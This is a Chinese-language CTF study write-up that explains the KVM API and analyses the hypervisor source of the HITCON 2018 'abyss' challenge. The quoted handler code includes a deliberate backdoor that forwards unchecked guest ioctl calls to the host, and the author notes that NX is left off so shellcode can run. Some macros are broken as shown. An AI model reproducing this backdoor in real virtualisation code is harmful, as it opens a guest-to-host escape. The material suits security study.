kvm + guest kernel

KVM 基础知识

kvm 是一个内核模块,它实现了一个 /dev/kvm 的字符设备来与用户空间交互,用户态程序(如 qemu)通过调用一系列 ioctl 函数实现 qemu 和 kvm 之间的切换。

KVM结构体

KVM 结构体在 KVM 的系统架构中代表一个具体的虚拟机。当用户通过 KVM_CREATE_VM 指令创建一个新的虚拟机时,就会创建一个新的 KVM 结构体对象。

struct kvm结构体如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
/*
 * struct kvm — one instance per virtual machine, created by the
 * KVM_CREATE_VM ioctl.  Quoted from the Linux kernel sources; it tracks
 * all per-VM state used inside KVM (memory slots, vCPUs, I/O buses,
 * interrupt routing, MMU-notifier bookkeeping, statistics).
 */
struct kvm {
spinlock_t mmu_lock;
struct mutex slots_lock;
struct mm_struct *mm; /* userspace tied to this vm */
struct kvm_memslots *memslots; /* guest-physical memory slots (GPA -> HVA) */
struct srcu_struct srcu;
#ifdef CONFIG_KVM_APIC_ARCHITECTURE
u32 bsp_vcpu_id;
#endif
struct kvm_vcpu *vcpus[KVM_MAX_VCPUS]; /* one entry per virtual CPU */
atomic_t online_vcpus;
int last_boosted_vcpu;
struct list_head vm_list;
struct mutex lock;
struct kvm_io_bus *buses[KVM_NR_BUSES]; /* emulated I/O buses (e.g. ISA, PCI) */
#ifdef CONFIG_HAVE_KVM_EVENTFD
struct {
spinlock_t lock;
struct list_head items;
struct list_head resampler_list;
struct mutex resampler_lock;
} irqfds;
struct list_head ioeventfds;
#endif
struct kvm_vm_stat stat; /* runtime statistics (page table, MMU, ...) */
struct kvm_arch arch; /* architecture-specific VM state */
atomic_t users_count;
#ifdef KVM_COALESCED_MMIO_PAGE_OFFSET
struct kvm_coalesced_mmio_ring *coalesced_mmio_ring;
spinlock_t ring_lock;
struct list_head coalesced_zones;
#endif

struct mutex irq_lock;
#ifdef CONFIG_HAVE_KVM_IRQCHIP
/*
* Update side is protected by irq_lock and,
* if configured, irqfds.lock.
*/
struct kvm_irq_routing_table __rcu *irq_routing;
struct hlist_head mask_notifier_list;
struct hlist_head irq_ack_notifier_list;
#endif

#if defined(CONFIG_MMU_NOTIFIER) && defined(KVM_ARCH_WANT_MMU_NOTIFIER)
struct mmu_notifier mmu_notifier;
unsigned long mmu_notifier_seq;
long mmu_notifier_count;
#endif
long tlbs_dirty;
struct list_head devices;
};

KVM 结构体对象包含了 vCPU、内存、APIC、IRQ、MMU、Event(事件)管理等信息,该结构体中的信息主要在 KVM 虚拟机内部使用,用于跟踪虚拟机的状态。

在 KVM中,连接了如下几个重要的结构体成员,他们对虚拟机的运行有重要作用。

  • struct kvm_memslots *memslots;
    KVM虚拟机所分配到的内存slot,以数组形式存储这些slot的地址信息。
    由于客户机物理地址不能直接用于宿主机物理 MMU 进行寻址,所以需要把客户机物理地址转换成宿主机虚拟地址 (Host Virtual Address, HVA),为此,KVM 用一个 kvm_memory_slot 数据结构来记录每一个地址区间的映射关系,此数据结构包含了对应此映射区间的起始客户机页帧号 (Guest Frame Number, GFN),映射的内存页数目以及起始宿主机虚拟地址。于是 KVM 就可以实现对客户机物理地址到宿主机虚拟地址之间的转换,也即首先根据客户机物理地址找到对应的映射区间,然后根据此客户机物理地址在此映射区间的偏移量就可以得到其对应的宿主机虚拟地址。进而再通过宿主机的页表也可实现客户机物理地址到宿主机物理地址之间的转换,也即 GPA 到 HPA 的转换。

  • struct kvm_vcpu *vcpus[KVM_MAX_VCPUS];
    KVM虚拟机中包含的vCPU结构体,一个虚拟机CPU对应一个vCPU结构体。

  • struct kvm_io_bus *buses[KVM_NR_BUSES];
    KVM虚拟机中的I/O总线,一条总线对应一个kvm_io_bus结构体,如ISA总线、PCI总线。

  • struct kvm_vm_stat stat;
    KVM虚拟机中的页表、MMU等运行时的状态信息。

  • struct kvm_arch arch;
    KVM的软件arch方面所需要的一些参数。

KVM初始化过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
// Obtain a handle to the KVM subsystem
kvm = open("/dev/kvm", O_RDWR | O_CLOEXEC);
if (kvm == -1)
err(1, "/dev/kvm");

// Make sure we are talking to the expected KVM API version (always 12)
ret = ioctl(kvm, KVM_GET_API_VERSION, NULL);
if (ret == -1)
err(1, "KVM_GET_API_VERSION");
if (ret != 12)
errx(1, "KVM_GET_API_VERSION %d, expected 12", ret);

// Create a virtual machine
vmfd = ioctl(kvm, KVM_CREATE_VM, (unsigned long)0);
if (vmfd == -1)
err(1, "KVM_CREATE_VM");

// Allocate one page of guest memory and load the code (image) into it.
// NOTE(review): mmap reports failure with MAP_FAILED, not NULL — the
// check below can never fire; compare with the mmap(2) man page.
mem = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
if (!mem)
err(1, "allocating guest memory");
memcpy(mem, code, sizeof(code));

// Why start at 0x1000?  The first 4 KiB of the address space is left
// free for the page-table directory.
struct kvm_userspace_memory_region region = {
.slot = 0,
.guest_phys_addr = 0x1000,
.memory_size = 0x1000,
.userspace_addr = (uint64_t)mem,
};
// Install the memory region into the VM
ret = ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region);
if (ret == -1)
err(1, "KVM_SET_USER_MEMORY_REGION");

// Create one virtual CPU
vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, (unsigned long)0);
if (vcpufd == -1)
err(1, "KVM_CREATE_VCPU");

// Query the size of the shared kvm_run structure
ret = ioctl(kvm, KVM_GET_VCPU_MMAP_SIZE, NULL);
if (ret == -1)
err(1, "KVM_GET_VCPU_MMAP_SIZE");
mmap_size = ret;
if (mmap_size < sizeof(*run))
errx(1, "KVM_GET_VCPU_MMAP_SIZE unexpectedly small");
// Map kvm_run for this vCPU so we can read its runtime state
// (NOTE(review): same MAP_FAILED-vs-NULL issue as above)
run = mmap(NULL, mmap_size, PROT_READ | PROT_WRITE, MAP_SHARED, vcpufd, 0);
if (!run)
err(1, "mmap vcpu");

// Read the special registers
ret = ioctl(vcpufd, KVM_GET_SREGS, &sregs);
if (ret == -1)
err(1, "KVM_GET_SREGS");
// Point the code segment at address 0 — the code was loaded at the
// start of the guest address space
sregs.cs.base = 0;
sregs.cs.selector = 0;
// Write the special registers back with KVM_SET_SREGS
ret = ioctl(vcpufd, KVM_SET_SREGS, &sregs);
if (ret == -1)
err(1, "KVM_SET_SREGS");

// Set the entry point (like main() for the guest); this 16-bit code
// starts at 0x1000.  For a real image, rip would point at the
// instructions loaded from the boot sector.
struct kvm_regs regs = {
.rip = 0x1000,
.rax = 2, // initial value of ax
.rbx = 2, // likewise for bx
.rflags = 0x2, // RFLAGS bit 1 is reserved-set on x86; entry fails without it
};
ret = ioctl(vcpufd, KVM_SET_REGS, &regs);
if (ret == -1)
err(1, "KVM_SET_REGS");

// Run the VM.  qemu-kvm would run each vCPU on its own thread.
while (1) {
// Enter the guest; returns on a VM exit
ret = ioctl(vcpufd, KVM_RUN, NULL);
if (ret == -1){
// error handling elided
}
}

源码分析

参考网上有的 Hitcon 2018 abyss 题目的源码,整体分析一下这类题目的大致逻辑。

整个题目由 3 个 binary,即 hypervisor.elf、kernel.bin 和 user.elf 组成:

hypervisor.elf是一个利用KVM API来做虚拟化的程序,它会加载一个小型的内核kernel.bin,这个kernel就只实现了内存管理和中断处理的功能,提供了loader启动和libc加载需要的一些常见syscall,然后解析ELF启动一个用户态程序。这里直接加载ld.so.2来装载用户态程序user.elf

user.elf 就是一个标准的 x86-64 ELF 文件,也可以直接在 host 上启动。kernel.bin 在处理 syscall 时,将一些与 IO 有关的例如 read/write 等通过 I/O Port(CPU 的 in/out 指令)交给 hypervisor 来处理。例如 open 这个 syscall,kernel 在做检查之后,直接通过 hypercall 传给 hypervisor 处理,然后 hypervisor 会在 host 上打开一个文件,并将其 fd 做一个映射返回给 kernel。所以实际上 VM 内做的 open 是可以打开 host 的文件的。

hypervisor

首先是 main 函数,主要重点有 kvm_init、copy_argv 和 execute 函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/*
 * Entry point: load the kernel image named on the command line, create
 * the KVM virtual machine, copy the remaining argv onto the guest
 * kernel's stack, then enter the vCPU run loop (execute never returns).
 */
int main(int argc, char *argv[]) {
if(argc < 3) {
/* NOTE(review): the trailing "\n" of this string (and of the error
 * format below) appears to have been lost when the listing was
 * extracted from the original source. */
printf("Usage: %s kernel.bin <static-elf> [args...] ", argv[0]);
exit(EXIT_FAILURE);
}
alarm(60); /* kill the challenge after 60 s (CTF timeout) */
uint8_t *code;
size_t len;
// read the kernel image into a heap buffer
read_file(argv[1], &code, &len);
if(len > MAX_KERNEL_SIZE)
error("Kernel size exceeded, %p > MAX_KERNEL_SIZE(%p). ",
(void*) len,
(void*) MAX_KERNEL_SIZE);
// create and initialise the KVM virtual machine
VM* vm = kvm_init(code, len);
copy_argv(vm, argc - 2, &argv[2]);
execute(vm);
}

kvm_init

kvm_init函数的整体逻辑和上面说的 KVM初始过程差不多,主要实现了初始化和创建 kvm,创建了KVM内存和CPU, 然后拷贝了用户代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
/*
 * kvm_init — create a KVM virtual machine and prepare it to run:
 * opens /dev/kvm, verifies the API version, creates a VM and one vCPU,
 * installs MEM_SIZE bytes of anonymous memory as guest-physical RAM,
 * copies the kernel image to guest physical address 0, maps the shared
 * kvm_run structure, and switches the vCPU into 64-bit long mode.
 *
 * code/len: kernel image to load.
 * Returns a heap-allocated VM descriptor; exits via pexit/error on any
 * failure.
 */
VM* kvm_init(uint8_t code[], size_t len) {
// handle to the KVM subsystem
int kvmfd = open("/dev/kvm", O_RDONLY | O_CLOEXEC);
if(kvmfd < 0) pexit("open(/dev/kvm)");
// refuse to run against an unexpected KVM ABI
int api_ver = ioctl(kvmfd, KVM_GET_API_VERSION, 0);
if(api_ver < 0) pexit("KVM_GET_API_VERSION");
if(api_ver != KVM_API_VERSION) {
error("Got KVM api version %d, expected %d ",
api_ver, KVM_API_VERSION);
}
// create the virtual machine
int vmfd = ioctl(kvmfd, KVM_CREATE_VM, 0);
if(vmfd < 0) pexit("ioctl(KVM_CREATE_VM)");
// guest-physical RAM; mmap reports failure with MAP_FAILED, not NULL
void *mem = mmap(0,
MEM_SIZE,
PROT_READ | PROT_WRITE,
MAP_SHARED | MAP_ANONYMOUS,
-1, 0);
if(mem == MAP_FAILED) pexit("mmap(MEM_SIZE)");
size_t entry = 0;
// load the kernel image at guest physical address `entry` (0)
memcpy((void*) mem + entry, code, len);
// describe the guest-physical memory region to KVM
struct kvm_userspace_memory_region region = {
.slot = 0,
.flags = 0,
.guest_phys_addr = 0,
.memory_size = MEM_SIZE,
.userspace_addr = (size_t) mem
};
if(ioctl(vmfd, KVM_SET_USER_MEMORY_REGION, &region) < 0) {
pexit("ioctl(KVM_SET_USER_MEMORY_REGION)");
}
// create the (single) virtual CPU
int vcpufd = ioctl(vmfd, KVM_CREATE_VCPU, 0);
if(vcpufd < 0) pexit("ioctl(KVM_CREATE_VCPU)");
// size of the shared kvm_run structure; keep it signed so errors are
// detectable (the original stored it in a size_t, hiding -1)
int vcpu_mmap_size = ioctl(kvmfd, KVM_GET_VCPU_MMAP_SIZE, NULL);
if(vcpu_mmap_size < 0) pexit("ioctl(KVM_GET_VCPU_MMAP_SIZE)");
// map kvm_run so the hypervisor can read exit reasons / I/O data
struct kvm_run *run = (struct kvm_run*) mmap(0,
vcpu_mmap_size,
PROT_READ | PROT_WRITE,
MAP_SHARED,
vcpufd, 0);
if(run == MAP_FAILED) pexit("mmap(kvm_run)");
// package everything into the VM descriptor
VM *vm = malloc(sizeof *vm);
if(vm == NULL) pexit("malloc(VM)");
*vm = (struct VM){
.mem = mem,
.mem_size = MEM_SIZE,
.vcpufd = vcpufd,
.run = run
};
// general-purpose registers: entry point, temporary stack, free-page info
setup_regs(vm, entry);
// page tables + segment descriptors for 64-bit long mode
setup_long_mode(vm);

return vm;
}

setup_regs

主要设置了 KVM运行时的寄存器,包括代码运行点,内存大小等

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/* set rip = entry point
 * set rsp = MAX_KERNEL_SIZE + KERNEL_STACK_SIZE (the max address can be used)
 *
 * set rdi = PS_LIMIT (start of free (unpaging) physical pages)
 * set rsi = MEM_SIZE - rdi (total length of free pages)
 * Kernel could use rdi and rsi to initialize its memory allocator.
 */
void setup_regs(VM *vm, size_t entry) {
struct kvm_regs regs;
/* KVM_GET_REGS reads the general-purpose registers (the original
 * comment wrongly said KVM_GET_SREGS) */
if(ioctl(vm->vcpufd, KVM_GET_REGS, &regs) < 0) pexit("ioctl(KVM_GET_REGS)");
regs.rip = entry; /* guest starts executing here */
regs.rsp = MAX_KERNEL_SIZE + KERNEL_STACK_SIZE; /* temporary stack */
regs.rdi = PS_LIMIT; /* start of free pages */
regs.rsi = MEM_SIZE - regs.rdi; /* total length of free pages */
regs.rflags = 0x2; /* RFLAGS bit 1 is reserved and must be set */
/* write the registers back; fixed the unbalanced ")" in the error string */
if(ioctl(vm->vcpufd, KVM_SET_REGS, &regs) < 0) pexit("ioctl(KVM_SET_REGS)");
}

设置寄存器的值时,有一个很重要的点是我们要关注的,即是否设置了 EFER 寄存器的 NXE 位。如果该位(1<<11,即 0x800)被置位,那么意味着 hypervisor 开启了 NX 即数据执行保护,这对于我们后续 EXP 的编写影响很大。

此处我们可以看到未设置 EFER 的 NXE 位,也就是未开启 NX,我们后续可以直接执行 shellcode.

setup_long_mode

主要是设置了段页的各项属性,包括pml4、pdp、pd、cr3等指定页表映射等关系的内存和寄存器。这一块页表映射还有点不太懂。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
/* Maps:
* 0 ~ 0x200000 -> 0 ~ 0x200000
*/
void setup_paging(VM *vm) {
struct kvm_sregs sregs;
if(ioctl(vm->vcpufd, KVM_GET_SREGS, &sregs) < 0) pexit("ioctl(KVM_GET_SREGS)");
// page tables live right after the kernel image in guest-physical memory
uint64_t pml4_addr = MAX_KERNEL_SIZE;
uint64_t *pml4 = (void*) (vm->mem + pml4_addr);
// PDP table one page after the PML4
uint64_t pdp_addr = pml4_addr + 0x1000;
uint64_t *pdp = (void*) (vm->mem + pdp_addr);
// page directory one page after the PDP
uint64_t pd_addr = pdp_addr + 0x1000;
uint64_t *pd = (void*) (vm->mem + pd_addr);
// pml4[0] -> pdp, pdp[0] -> pd; pd[0] is one 2 MiB huge page (PDE64_PS)
// identity-mapping 0 ~ 0x200000 (the original comment said "2k")
pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pdp_addr;
pdp[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_addr;
pd[0] = PDE64_PRESENT | PDE64_RW | PDE64_PS; /* kernel only, no PED64_USER */
// CR3 holds the guest-physical address of the PML4; CR4/CR0/EFER
// enable PAE, paging, protection and long mode.  Note EFER.NXE is NOT
// set here, so NX (data execution prevention) stays off in the guest.
sregs.cr3 = pml4_addr;
sregs.cr4 = CR4_PAE;
sregs.cr4 |= CR4_OSFXSR | CR4_OSXMMEXCPT; /* enable SSE instruction */
sregs.cr0 = CR0_PE | CR0_MP | CR0_ET | CR0_NE | CR0_WP | CR0_AM | CR0_PG;
sregs.efer = EFER_LME | EFER_LMA;
sregs.efer |= EFER_SCE; /* enable syscall instruction */
// commit the special registers
if(ioctl(vm->vcpufd, KVM_SET_SREGS, &sregs) < 0) pexit("ioctl(KVM_SET_SREGS)");
}

/*
 * setup_seg_regs — install flat 64-bit segment descriptors: one ring-0
 * code segment (selector 0x08) and one data segment (selector 0x10)
 * shared by ds/es/fs/gs/ss.
 */
void setup_seg_regs(VM *vm) {
struct kvm_sregs sregs;
// read the current special registers so only the segments change
if(ioctl(vm->vcpufd, KVM_GET_SREGS, &sregs) < 0) pexit("ioctl(KVM_GET_SREGS)");
// 64-bit ring-0 code segment descriptor
struct kvm_segment seg = {
.base = 0,
.limit = 0xffffffff,
.selector = 1 << 3,
.present = 1,
.type = 0xb, /* Code segment */
.dpl = 0, /* Kernel: level 0 */
.db = 0,
.s = 1,
.l = 1, /* long mode */
.g = 1
};
sregs.cs = seg;
// reuse the descriptor for all data segments
seg.type = 0x3; /* Data segment */
seg.selector = 2 << 3;
sregs.ds = sregs.es = sregs.fs = sregs.gs = sregs.ss = seg;
if(ioctl(vm->vcpufd, KVM_SET_SREGS, &sregs) < 0) pexit("ioctl(KVM_SET_SREGS)");
}

/*
* Switching to long mode usually done by kernel.
* We put the task in hypervisor because we want our KVM be able to execute
* normal x86-64 assembled code as well. Which let us easier to debug and test.
*
*/
void setup_long_mode(VM *vm) {
// build identity page tables and set CR0/CR3/CR4/EFER
setup_paging(vm);
// install 64-bit code/data segment descriptors
setup_seg_regs(vm);
}

copy_argv

copy_argv函数将一些参数拷贝到内核栈上

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/* copy argv onto kernel's stack */
/*
 * Layout built (from deep to shallow): the argv strings, a 16-byte
 * alignment gap, a NULL-terminated argv pointer array rebased to
 * guest-physical addresses, then argc at the final rsp — the layout the
 * kernel entry stub reads via [rsp] / [rsp+8].
 */
void copy_argv(VM* vm, int argc, char *argv[]) {
struct kvm_regs regs;
if(ioctl(vm->vcpufd, KVM_GET_REGS, &regs) < 0) pexit("ioctl(KVM_GET_REGS)");
// host-virtual view of the guest stack pointer
char *sp = (char*)vm->mem + regs.rsp;
char **copy = (char**) malloc(argc * sizeof(char*));
#define STACK_ALLOC(sp, len) ({ sp -= len; sp; })
// push the strings, last argument deepest
for(int i = argc - 1; i >= 0; i--) {
int len = strlen(argv[i]) + 1;
copy[i] = STACK_ALLOC(sp, len);
memcpy(copy[i], argv[i], len);
}
// round down to 16-byte alignment
sp = (char*) ((uint64_t) sp & -0x10);
/* push argv */
*(uint64_t*) STACK_ALLOC(sp, sizeof(char*)) = 0;
for(int i = argc - 1; i >= 0; i--)
// host pointer -> guest-physical address
*(uint64_t*) STACK_ALLOC(sp, sizeof(char*)) = copy[i] - (char*)vm->mem;
/* push argc */
*(uint64_t*) STACK_ALLOC(sp, sizeof(uint64_t)) = argc;
free(copy);
#undef STACK_ALLOC
// publish the new guest rsp
regs.rsp = sp - (char*) vm->mem;
if(ioctl(vm->vcpufd, KVM_SET_REGS, &regs) < 0) pexit("ioctl(KVM_SET_REGS)");
}

execute

最后会调用execute函数,我们可以看到开始循环运行KVM虚拟机,如果发生了中断会进入中断处理流程。其中我们重点关注 KVM_EXIT_IO,该流程会根据 io.port去调用 hp_handler来处理,如果处理失败才会退出虚拟机。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
/*
 * execute — the vCPU run loop.  Repeatedly enters the guest with
 * KVM_RUN and dispatches on the exit reason.  Hypercalls arrive as
 * KVM_EXIT_IO on ports carrying HP_NR_MARK and are forwarded to
 * hp_handler; everything else terminates the hypervisor.
 */
void __attribute__((noreturn)) execute(VM* vm) {
while(1) {
// enter the guest; returns on a VM exit
// NOTE(review): the KVM_RUN return value is not checked here
ioctl(vm->vcpufd, KVM_RUN, NULL);
dump_regs(vm->vcpufd);
#ifdef DEBUG
struct kvm_translation trans;
trans.linear_address = 0x00007ffffffec4b0;//0x00007ffff7df722f;
if(ioctl(vm->vcpufd, KVM_TRANSLATE, &trans) < 0) pexit("ioctl(KVM_TRANSLATE)");
debug("addr: %#llx, valid: %d, writable: %d, usermode: %d ",
trans.physical_address,
trans.valid,
trans.writeable,
trans.usermode);
uint64_t *ptr = (uint64_t*) ((char*)vm->mem + trans.physical_address);
if(trans.valid)
printf("0x%016llx 0x%016llx 0x%016llx 0x%016llx ", ptr[0], ptr[1], ptr[2], ptr[3]);
#endif
// dispatch on the VM-exit reason
switch (vm->run->exit_reason) {
// guest executed hlt: normal shutdown
case KVM_EXIT_HLT:
fprintf(stderr, "KVM_EXIT_HLT ");
exit(0);
// port I/O: this is how the guest kernel issues hypercalls
case KVM_EXIT_IO:
if(vm->run->io.port & HP_NR_MARK) {
// forward to the hypercall dispatcher
if(hp_handler(vm->run->io.port, vm) < 0) error("Hypercall failed ");
}
else error("Unhandled I/O port: 0x%x ", vm->run->io.port);
break;
// the cases below fall through; presumably error() never returns
// (NOTE(review): confirm error() is noreturn in the original source)
case KVM_EXIT_FAIL_ENTRY:
error("KVM_EXIT_FAIL_ENTRY: hardware_entry_failure_reason = 0x%llx ",
vm->run->fail_entry.hardware_entry_failure_reason);
case KVM_EXIT_INTERNAL_ERROR:
error("KVM_EXIT_INTERNAL_ERROR: suberror = 0x%x ",
vm->run->internal.suberror);
case KVM_EXIT_SHUTDOWN:
error("KVM_EXIT_SHUTDOWN ");
default:
error("Unhandled reason: %d ", vm->run->exit_reason);
}
}
}

hp_handle

hp_handler 定义了 hypervisor 接收内核发出的 IO 中断时的处理函数,可以看到主要处理了 open、read、write、lseek、close、fstat、exit、access、ioctl、panic 等函数。而其中 ioctl 函数未对参数做检查,可以在 host 上以任意参数来调用一个 ioctl 函数。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
/*
 * hp_handler — dispatch a hypercall (guest I/O-port access) to the
 * matching hp_handle_* routine.  `nr` is the I/O port number; each
 * hypercall owns one NR_HP_* port.  Returns 0 on success, a negative
 * errno on failure, -ENOSYS for unknown ports.
 */
int hp_handler(uint16_t nr, VM* vm) {
switch(nr) {
/* expands to: case NR_HP_open: return hp_handle_open(vm); etc. */
#define handle(f) case NR_HP_##f: return hp_handle_##f(vm)

handle(open);
handle(read);
handle(write);
handle(lseek);
handle(close);
handle(fstat);
handle(exit);
handle(access);
handle(ioctl);
handle(panic);

#undef handle
default:
return -ENOSYS;
}
}

/*
 * Hypercall plumbing.  Each hypercall is a pair of port accesses: an
 * OUT carrying a guest-physical argument offset, then an IN that reads
 * back the cached result.
 * NOTE(review): the multi-line macros below (THEN_RETURN, MEM_AT)
 * appear to have lost their line-continuation backslashes when this
 * listing was extracted — they cannot compile as shown here.
 */
#define UNUSED_VAR 0xdeadffffu

/* the 4 bytes of I/O data: OUT argument or IN result slot */
#define FETCH_U32 (*(uint32_t*)((uint8_t*)vm->run + vm->run->io.data_offset))

/* OUT = guest passes arguments; the matching IN returns the saved result */
#define PROCESS if(vm->run->io.direction == KVM_EXIT_IO_OUT)
#define THEN_RETURN(var) else {
if(var == UNUSED_VAR) return -1;
FETCH_U32 = var;
var = UNUSED_VAR;
}

/* abort if a guest-supplied offset points outside guest memory */
#define CHECK_OOB(var) assert(0 <= (var) && (var) < vm->mem_size)

/* guest-physical offset -> host-virtual pointer (bounds-checked) */
#define MEM_AT(offset) (
CHECK_OOB(offset),
(uint8_t*) vm->mem + (uint64_t) offset
)

/* maps a guest fd number to the real fd opened on the host */
typedef struct fd_handle {
int real_fd;
int opening;
} fd_handle;

#define MAX_FD 255

static fd_handle fd_map[MAX_FD + 1];

/* lazily initialise fd_map: stdin/stdout/stderr pass straight through */
static inline void MAY_INIT_FD_MAP() {
static int fd_map_init = 0;
if(!fd_map_init) {
fd_map_init = 1;
fd_map[0].real_fd = 0; fd_map[0].opening = 1;
fd_map[1].real_fd = 1; fd_map[1].opening = 1;
fd_map[2].real_fd = 2; fd_map[2].opening = 1;
for(int i = 3; i <= MAX_FD; i++)
fd_map[i].opening = 0;
}
}

/*
 * NR_HP_open: resolve the guest-supplied filename (a guest-physical
 * offset), bounds-check it, open it read-only on the HOST, and return
 * the lowest free guest fd.  The result is cached in the static `ret`
 * until the guest's IN access collects it via THEN_RETURN.
 */
static int hp_handle_open(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const char *filename = (char*) MEM_AT(offset);
// make sure the whole string, not just its first byte, is in bounds
uint32_t end = offset + strlen(filename);
CHECK_OOB(end);

/* puts(filename); */
MAY_INIT_FD_MAP();
// find the lowest unused guest fd slot
int min_fd;
for(min_fd = 0; min_fd <= MAX_FD; min_fd++)
if(fd_map[min_fd].opening == 0) break;
if(min_fd > MAX_FD) ret = -ENFILE;
else {
int fd = open(filename, O_RDONLY, 0);
if(fd < 0) ret = -errno;
else {
fd_map[min_fd].real_fd = fd;
fd_map[min_fd].opening = 1;
ret = min_fd;
}
}
} THEN_RETURN(ret);
return 0;
}

/* a guest fd is bad if out of range or not marked open */
#define BADFD(fd) (fd < 0 || fd > MAX_FD || fd_map[fd].opening == 0)
/* run `work` only on a valid open guest fd; translate errors to -errno.
 * NOTE(review): this macro too has lost its line-continuation
 * backslashes in extraction. */
#define PROCESS_ON_FD(work) do {
MAY_INIT_FD_MAP();
if(BADFD(fd)) ret = -EBADF;
else {
ret = work;
if(ret < 0) ret = -errno;
}
} while(0)

/*
 * Shared implementation of the read/write hypercalls.  The guest passes
 * a guest-physical offset to three u64s: (fd, buffer offset, length);
 * fptr is read(2) or write(2) on the host side.
 */
static int handle_rw(VM* vm, typeof(read) fptr) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = (int) kbuf[0];
uint64_t paddr = kbuf[1];
uint64_t nbytes = kbuf[2];

PROCESS_ON_FD(fptr(fd_map[fd].real_fd, MEM_AT(paddr), nbytes));

} THEN_RETURN(ret);
return 0;
}

/* NR_HP_read: read(2) from a mapped host fd into guest memory */
static int hp_handle_read(VM* vm) {
return handle_rw(vm, read);
}

/* NR_HP_write: write(2) guest memory to a mapped host fd */
static int hp_handle_write(VM* vm) {
#pragma GCC diagnostic push
#pragma GCC diagnostic ignored "-Wincompatible-pointer-types"
/* Justification: here just cast write into typeof(read) */
return handle_rw(vm, write);
#pragma GCC diagnostic pop
}

/* NR_HP_lseek: guest passes (fd, offset, whence) as three u32s */
static int hp_handle_lseek(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint32_t *kbuf = (uint32_t*) MEM_AT(offset);
int fd = kbuf[0];
uint32_t off = kbuf[1];
int whence = kbuf[2];

PROCESS_ON_FD(lseek(fd_map[fd].real_fd, off, whence));

} THEN_RETURN(ret);
return 0;
}

/* mark the guest fd slot free, then close the real host fd */
static inline int do_close(struct fd_handle *h) {
h->opening = 0;
return close(h->real_fd);
}

/* NR_HP_close: close a mapped host fd */
static int hp_handle_close(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
int fd = FETCH_U32;

PROCESS_ON_FD(do_close(&fd_map[fd]));

} THEN_RETURN(ret);
return 0;
}

/* NR_HP_fstat: host fstat(2) written straight into guest memory.
 * NOTE(review): assumes the guest's struct stat layout matches the
 * host's — confirm against the kernel sources. */
static int hp_handle_fstat(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = kbuf[0];
uint64_t paddr = kbuf[1];

PROCESS_ON_FD(fstat(fd_map[fd].real_fd, (struct stat*) MEM_AT(paddr)));

} THEN_RETURN(ret);
return 0;
}

/* NR_HP_access: host access(2) on a guest-supplied path */
static int hp_handle_access(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint32_t *kbuf = (uint32_t*) MEM_AT(offset);
uint32_t paddr = kbuf[0];
int mode = kbuf[1];

ret = access((const char*) MEM_AT(paddr), mode);
} THEN_RETURN(ret);
return 0;
}

/* I'm sorry.. this is a backdoor.. */
// No checks at all: lets the guest invoke ioctl(2) on the host with an
// arbitrary fd, request, and (bounds-checked) argument pointer.
static int hp_handle_ioctl(VM *vm) {
static int ret = UNUSED_VAR;
PROCESS {
uint32_t offset = FETCH_U32;
const uint64_t *kbuf = (uint64_t*) MEM_AT(offset);
int fd = kbuf[0];
unsigned long request = kbuf[1];
uint32_t paddr = kbuf[2];
if(paddr == 0) ret = ioctl(fd, request, 0);
else ret = ioctl(fd, request, MEM_AT(paddr));
if(ret < 0) ret = -errno;
} THEN_RETURN(ret);
return 0;
}

/* NR_HP_exit: terminate the whole hypervisor with the guest's status */
